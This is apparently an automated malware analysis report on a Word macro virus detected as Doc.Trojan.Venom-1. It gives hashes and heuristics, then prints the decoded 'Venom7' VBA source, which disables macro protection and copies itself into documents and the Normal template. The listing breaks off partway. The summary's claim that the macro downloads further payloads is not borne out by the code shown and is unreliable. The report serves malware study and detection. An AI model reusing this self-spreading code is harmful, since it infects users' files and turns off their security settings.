Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7cb3a882cb06ff26…

MALICIOUS

Office (OLE)

Size: 37.0 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 20e46f7b587a697b2e5fec13d20162b4
SHA-1: f9a52d03bbaf56d2442255a169c40da8a2a17020
SHA-256: 7cb3a882cb06ff2603a95b5dfbb1264343b1e693bb60071bae3c6311ea2f16cf
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Venom-1'. It contains VBA macros, including a 'Document_Open' macro, which is a common technique for executing malicious code upon opening the document. The script attempts to disable macro security features and modify the document's structure, suggesting it's designed to download and execute further payloads.

Heuristics 3

  • ClamAV: Doc.Trojan.Venom-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Venom-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14458 bytes
SHA-256: c907d43947f004939a1c8a02e3d38cd6ab558be38969db93a4475c97fda22d53
Detection: ClamAV: Doc.Trojan.Venom-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Venom7"
Attribute VB_Base = "1Normal.Venom7"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_New()
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2

If ADI1.Name <> "Venom7" Then
    If ADCL > 0 Then
        Dim f As Long
        For f = 1 To ADCL
            On Error Resume Next
            ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines f, 1
        Next f
        ADI1.Name = "Venom7"
        DoAD = True
    Else
        ADI1.Name = "Venom7"
        DoAD = True
    End If
End If

If NTI1.Name <> "Venom7" Then
    If NTCL > 0 Then
        Dim i As Long
        For i = 1 To NTCL
            On Error Resume Next
            NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines i, 1
        Next i
        NTI1.Name = "Venom7"
        DoNT = True
    Else
        NTI1.Name = "Venom7"
        DoNT = True
    End If
End If
If DoNT <> True And DoAD <> True Then GoTo CYA

If DoAD = True Then
    For hunger = NTCL To 1 Step -1
        ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(hunger, 1)
    Next hunger
    docname = Left$(ActiveDocument.Name, 8)
    If docname <> "Document" Then
    ActiveDocument.Save
    End If
End If

If DoNT = True Then
    For hunger = ADCL To 1 Step -1
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(hunger, 1)
    Next hunger
End If



CYA:
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."

End Sub

Private Sub Document_Open()

CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2

If ADI1.Name <> "Venom7" Then
    If ADCL > 0 Then
        Dim f As Long
        For f = 1 To ADCL
            On Error Resume Next
            ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines f, 1
        Next f
        ADI1.Name = "Venom7"
        DoAD = True
    Else
        ADI1.Name = "Venom7"
        DoAD = True
    End If
End If

If NTI1.Name <> "Venom7" Then
    If NTCL > 0 Then
        Dim i As Long
        For i = 1 To NTCL
            On Error Resume Next
            NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines i, 1
        Next i
        NTI1.Name = "Venom7"
        DoNT = True
    Else
        NTI1.Name = "Venom7"
        DoNT = True
    End If
End If
If DoNT <> True And DoAD <> True Then GoTo CYA

If DoAD = True Then
    For hunger = NTCL To 1 Step -1
        ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(hunger, 1)
    Next hunger
    ActiveDocument.Save
End If

If DoNT = True Then
    For hunger = ADCL To 1 Step -1
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(hunger, 1)
    Next hunger
End If



CYA:
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."
... (truncated)